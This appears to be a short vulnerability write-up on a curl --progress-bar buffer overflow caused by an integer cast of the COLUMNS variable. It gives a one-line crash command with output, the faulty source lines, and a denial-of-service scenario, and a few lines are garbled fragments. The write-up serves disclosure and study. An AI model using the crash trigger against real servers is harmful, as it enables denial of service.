If an attacker can set environmental variables, curl will always crash with a buffer overflow when downloading a file – if the
--progress-bar argument is set.
Just run the following command on a 64-bit Linux system (verified on Ubuntu 19.04).
.profileconfiguration file instead...
env COLUMNS="9223372032559808515" curl "http://hubblesource.stsci.edu/sources/video/clips/details/images/hale_bopp_2.mpg" -o "./test.mpg" ```
23,0%*** buffer overfow detected ***: curl terminated
Aborted (core dumped)
Explanation of the bug
progress-bar feature parses the
COLUMNS environment variable. The source code aims to guarantee this value to be above 20. However, on Linux systems this check fails due to a faulty integer cast in
colp = curlx_getenv("COLUMNS");
long num = strtol(colp, &endptr, 10);
// Our value of 9223372032559808515 will be OK!
if((endptr != colp) && (endptr == colp + strlen(colp)) && (num > 20))
// BUG! Back to int... 9223372032559808515 becomes 3.
bar->width = (int)num;
Then on line 181 we have the buffer overflow:
barwidth = bar->width - 7; // HERE we get 3-7 resulting in...
num = (int) (((double)barwidth) * frac);
if(num > MAX_BARLENGTH)
num = MAX_BARLENGTH;
memset(line, '#', num); // .... a crazy high value here!
If a server runs
curl with the
--progress-bar argument set and (intentionally or unintentionally) allows an attacker to set environmental variables, the server could easily become a victim of a DoS attack.